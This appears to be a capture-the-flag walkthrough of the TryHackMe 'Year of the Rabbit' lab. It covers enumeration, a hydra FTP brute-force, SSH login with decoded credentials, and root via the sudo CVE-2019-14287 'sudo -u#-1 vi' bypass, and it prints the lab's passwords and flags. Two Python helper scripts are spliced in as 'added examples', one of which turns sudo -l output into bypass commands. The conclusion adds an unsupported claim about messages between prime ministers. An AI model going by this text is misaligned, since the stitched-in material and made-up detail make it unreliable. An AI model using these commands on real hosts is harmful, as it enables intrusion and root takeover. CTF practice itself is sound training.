In this walkthrough, we will work through the Year of the Rabbit room from TryHackMe. The room is rated easy on the platform and covers enumeration, password brute-forcing, exploitation and privilege escalation. So, let’s get started without any delay.
Machine Info:
| Field | Value |
| --- | --- |
| Title | Year of the Rabbit |
| IP address | 10.10.122.215 |
| Difficulty | Easy |
| Objective | Let’s have a nice gentle start to the New Year! Can you hack into the Year of the Rabbit box without falling down a hole? |
Enumeration:
- Starting with a regular nmap scan (a SYN scan with version detection, which is why it needs sudo), we find ports 21, 22 and 80 open, running FTP, SSH and HTTP respectively.
sudo nmap -sS -sV 10.10.122.215
- Firing up gobuster on port 80 finds the directory /assets. Browsing it reveals style.css, which references a hidden page, sup3r_s3cr3t_fl4g.php.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.122.215/ -w ~/Desktop/Wordlist/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.122.215/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/24 21:39:49 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/assets               (Status: 301) [Size: 315] [--> http://10.10.122.215/assets/]
/index.html           (Status: 200) [Size: 7853]
/server-status        (Status: 403) [Size: 278]
Progress: 3941 / 4656 (84.64%)
===============================================================
2023/04/24 21:41:41 Finished
===============================================================
- Navigating to sup3r_s3cr3t_fl4g.php runs an inline JavaScript snippet that redirects us to YouTube and rickrolls us.
- To stop the redirect, disable JavaScript in Firefox: open about:config, search for javascript.enabled and toggle it to false.
- As the page hints, I listened to the video, which only confirms that it is a rabbit hole. With the Network tab of the Developer Tools open, reloading the page shows a request to a hidden directory.
- The hidden directory reveals a file named Hot_babe.png
- Running strings against the image file reveals an FTP username, ftpuser, and a list of candidate passwords. We can save that list as a wordlist and feed it to hydra to brute-force the FTP password of ftpuser.
hydra -l ftpuser -P Wordlist ftp://10.10.122.215
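The strings-then-hydra step above can be scripted. The following is an added example, not the author's code: a strings(1)-style extractor in Python that walks the PNG chunk structure and returns only the printable text appended after the IEND chunk, which is where data hidden in a PNG usually sits, then splits it into a username and a wordlist for hydra. The image bytes, the banner wording and the candidate passwords are constructed for this demonstration and are not the contents of the real Hot_babe.png; the `FTP username:` and `Possible passwords:` markers are assumptions of this sample, so adjust the regex to whatever the real file says.

```python
import re
import struct
import zlib
from typing import List, Optional, Tuple

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"

# Constructed banner standing in for the text hidden in the challenge image;
# the real file's wording and passwords are deliberately not reproduced here.
SAMPLE_NOTE = (
    b"FTP username: ftpuser\n"
    b"Possible passwords:\n"
    b"ex4mple-p4ss-1\n"
    b"ex4mple-p4ss-2\n"
    b"ex4mple-p4ss-3\n"
)


def png_chunk(ctype: bytes, data: bytes) -> bytes:
    """Serialise one PNG chunk: 4-byte big-endian length, type, payload, CRC32 over type+payload."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def build_sample_png(appended: bytes = SAMPLE_NOTE) -> bytes:
    """Build a minimal valid 1x1 8-bit grayscale PNG and append `appended` after IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)  # width, height, depth, colour, comp, filter, interlace
    idat = zlib.compress(b"\x00\x00")                    # one filter byte + one pixel
    png = (PNG_SIGNATURE
           + png_chunk(b"IHDR", ihdr)
           + png_chunk(b"IDAT", idat)
           + png_chunk(b"IEND", b""))
    return png + appended


def printable_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Runs of at least `min_len` printable ASCII bytes, the same idea as `strings -n <min_len>`."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, data)]


def trailing_data(png: bytes) -> bytes:
    """Walk the chunk list and return whatever follows the IEND chunk (b"" if nothing)."""
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(png):
        length, ctype = struct.unpack(">I4s", png[pos:pos + 8])
        pos += 8 + length + 4  # header, payload, CRC
        if ctype == b"IEND":
            return png[pos:]
    return b""


def extract_ftp_hints(png: bytes) -> Tuple[Optional[str], List[str]]:
    """Pull the username and the candidate passwords out of the text appended to the image."""
    username = None
    candidates: List[str] = []
    for line in printable_strings(trailing_data(png)):
        m = re.match(r"FTP username:\s*(\S+)", line)  # assumed marker, see lead-in
        if m:
            username = m.group(1)
        elif line.endswith(":"):
            continue  # a header line such as "Possible passwords:"
        else:
            candidates.append(line)
    return username, candidates


def write_wordlist(candidates: List[str], path: str) -> None:
    """One candidate per line, ready for `hydra -l <user> -P <path> ftp://<host>`."""
    with open(path, "w") as fh:
        fh.write("\n".join(candidates) + "\n")


if __name__ == "__main__":
    user, words = extract_ftp_hints(build_sample_png())
    write_wordlist(words, "wordlist.txt")
    print(f"username: {user}, {len(words)} candidate passwords written to wordlist.txt")
```

Against a real capture you would replace `build_sample_png()` with `open("Hot_babe.png", "rb").read()`; walking the chunks rather than grepping for the literal `IEND` avoids false hits if that string happens to occur inside image data.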
wh1terose@fsociety:~/CTF/TryHackme/Year of the Rabbit$ ftp 10.10.122.215
Connected to 10.10.122.215.
220 (vsFTPd 3.0.2)
Name (10.10.122.215:wh1terose): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             758 Jan 23  2020 Eli's_Creds.txt
226 Directory send OK.
ftp> ascii
200 Switching to ASCII mode.
ftp> get Eli's_Creds.txt
local: Eli's_Creds.txt remote: Eli's_Creds.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for Eli's_Creds.txt (758 bytes).
WARNING! 11 bare linefeeds received in ASCII mode
File may not have transferred correctly.
226 Transfer complete.
758 bytes received in 0.00 secs (5.0551 MB/s)
ftp> exit
221 Goodbye.
- We got a file, “Eli’s_Creds.txt”. Its contents look encrypted at first, and CyberChef was no help. It is actually a program in the esoteric language Brainfuck, so I decoded it with an online interpreter and obtained Eli’s password. (Switching to ascii mode before the transfer was unnecessary and is what triggered the bare-linefeed warning; the default binary mode fetches the file unchanged.)
wh1terose@fsociety:~/CTF/TryHackme/Year of the Rabbit$ cat "Eli's_Creds.txt"
+++++ ++++[ ->+++ +++++ +<]>+ +++.< +++++ [->++ +++<] >++++ +.<++ +[->- --<]> ----- .<+++ [->++ +<]>+ +++.< +++++ ++[-> ----- --<]> ----- --.<+ ++++[ ->--- --<]> -.<++ +++++ +[->+ +++++ ++<]> +++++ .++++ +++.- --.<+ +++++ +++[- >---- ----- <]>-- ----- ----. ---.< +++++ +++[- >++++ ++++< ]>+++ +++.< ++++[ ->+++ +<]>+ .<+++ +[->+ +++<] >++.. ++++. ----- ---.+ ++.<+ ++[-> ---<] >---- -.<++ ++++[ ->--- ---<] >---- --.<+ ++++[ ->--- --<]> -.<++ ++++[ ->+++ +++<] >.<++ +[->+ ++<]> +++++ +.<++ +++[- >++++ +<]>+ +++.< +++++ +[->- ----- <]>-- ----- -.<++ ++++[ ->+++ +++<] >+.<+ ++++[ ->--- --<]> ---.< +++++ [->-- ---<] >---. <++++ ++++[ ->+++ +++++ <]>++ ++++. <++++ +++[- >---- ---<] >---- -.+++ +.<++ +++++ [->++ +++++
- Brainfuck Decoder – https://www.dcode.fr/brainfuck-language
Username: Eli
Password: DSpDiM1wAEwid
Initial Access:
- We get our first shell by logging in over SSH with Eli’s credentials.
- As per the message, there is a hidden secret place; find locates it at /usr/games/s3cr3t. The hidden file inside gives us gwendoline’s password.
eli@year-of-the-rabbit:/$ find / -name s3cr3t 2> /dev/null
/usr/games/s3cr3t
eli@year-of-the-rabbit:/$ cd /usr/games/s3cr3t/
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls
eli@year-of-the-rabbit:/usr/games/s3cr3t$ ls -al
total 12
drwxr-xr-x 2 root root 4096 Jan 23  2020 .
drwxr-xr-x 3 root root 4096 Jan 23  2020 ..
-rw-r--r-- 1 root root  138 Jan 23  2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
eli@year-of-the-rabbit:/usr/games/s3cr3t$ cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\!
Your password is awful, Gwendoline.
It should be at least 60 characters long! Not just MniVCQVhQHUNI
Honestly!

Yours sincerely
   -Root
Username: gwendoline
Password: MniVCQVhQHUNI
- We got our user flag!
Privilege Escalation:
- The privilege escalation path is not obvious either. sudo -l shows that gwendoline may run /usr/bin/vi on her own user.txt as any user except root, i.e. the runas spec is (ALL, !root). That exclusion can be bypassed with the sudo 1.8.27 security bypass, CVE-2019-14287 (https://www.exploit-db.com/exploits/47502): asking sudo for a target uid of -1 (or 4294967295) satisfies the !root check because it is not uid 0, but setresuid(2) treats -1 as “leave unchanged”, so the command keeps sudo’s own uid of 0 and runs as root. The bug is fixed in sudo 1.8.28.
gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
gwendoline@year-of-the-rabbit:~$
- Run the command below. When vi opens, type :!cat /root/root.txt and press Enter; the root flag is printed, and vi waits for another Enter before returning to the editor.
gwendoline@year-of-the-rabbit:~$ sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txt
:!cat /root/root.txt
THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}

Press ENTER or type command to continue
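To make the bypass condition explicit, the following added example (mine, not from the original post) parses the sudo -l output shown above together with a sudo --version line and reports which rules can be abused via CVE-2019-14287. The version string is constructed, because the walkthrough never runs sudo --version; 1.8.27 is the version named by the Exploit-DB entry the author matched, and the fix shipped in 1.8.28. The check only recognises a runas list containing both ALL and !root; other spellings of the exclusion (for example !#0) are not handled, which is a limitation of this sample rather than of the bug.

```python
import re
from typing import Dict, List, Tuple

# Copied from the `sudo -l` transcript above.
SUDO_L_OUTPUT = """\
Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt
"""

# Constructed: the walkthrough does not show `sudo --version`; 1.8.27 is the
# version named by the Exploit-DB entry the author used.
SUDO_VERSION_OUTPUT = "Sudo version 1.8.27\n"

FIXED_IN = (1, 8, 28)  # CVE-2019-14287 (runas uid -1 bypass) was fixed in sudo 1.8.28

# One `sudo -l` rule line: "(runas_users[:runas_groups]) [TAG: ...] command"
RULE_RE = re.compile(r"^\(([^)]*)\)\s*((?:[A-Z]+:\s*)*)(.+)$")


def parse_sudo_version(text: str) -> Tuple[int, int, int]:
    """Extract (major, minor, patch) from `sudo --version` output; patch suffixes like p2 are ignored."""
    m = re.search(r"Sudo version (\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError("no sudo version found in output")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch


def parse_rules(sudo_l: str) -> List[Dict[str, object]]:
    """Return each command rule as {'runas': [users], 'tags': [TAGS], 'command': str}."""
    rules: List[Dict[str, object]] = []
    for raw in sudo_l.splitlines():
        m = RULE_RE.match(raw.strip())
        if not m:
            continue  # Defaults lines and prose do not start with "("
        runas_users = [u.strip() for u in m.group(1).split(":")[0].split(",")]
        tags = [t.rstrip(":") for t in m.group(2).split()]
        rules.append({"runas": runas_users, "tags": tags, "command": m.group(3).strip()})
    return rules


def cve_2019_14287_candidates(sudo_l: str, version_text: str) -> List[str]:
    """Commands that become root shells via `sudo -u#-1` when sudo is older than 1.8.28."""
    if parse_sudo_version(version_text) >= FIXED_IN:
        return []
    return [f"sudo -u#-1 {rule['command']}"
            for rule in parse_rules(sudo_l)
            if "ALL" in rule["runas"] and "!root" in rule["runas"]]  # type: ignore[operator]


if __name__ == "__main__":
    for cmd in cve_2019_14287_candidates(SUDO_L_OUTPUT, SUDO_VERSION_OUTPUT):
        print("bypassable rule, try:", cmd)
```

On a live target, feed the script the real output of `sudo -l` and `sudo --version`; if nothing is reported, either the sudo build is patched or the rule does not use the (ALL, !root) shape this check looks for.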
Task 1 – Flags
Question 1 – What is the user flag?
THM{1107174691af9ff3681d2b5bdb5740b1589bae53}
Question 2 – What is the root flag?
THM{8d6f163a87a1c80de27a4fd61aef0f3a0ecf9161}
Conclusion:
So that was “Year of the Rabbit” for you. We started with a regular nmap scan and found three open ports: 80 (HTTP), 22 (SSH) and 21 (FTP). Next, we performed directory brute-forcing with gobuster and found /assets, whose stylesheet leads to a secret page named sup3r_s3cr3t_fl4g.php. After getting rickrolled by that page, we used the Network tab to reveal a hidden directory called WExYY2Cv-qU, which holds a file named Hot_Babe.png. I then used the strings command to pull a potential password wordlist out of the image file, and used hydra with that wordlist to brute-force the FTP password of ftpuser. From the FTP server we obtained Eli’s credentials encoded as a Brainfuck program, decoded them and used them for initial access via SSH. Finally, in the privilege escalation part, we abused the sudo rule for the vi binary to read the contents of root.txt, along with the messages between the Israeli and Palestinian prime ministers. On that note, I will take your leave and meet you in the next one. Till then, “Happy hacking”.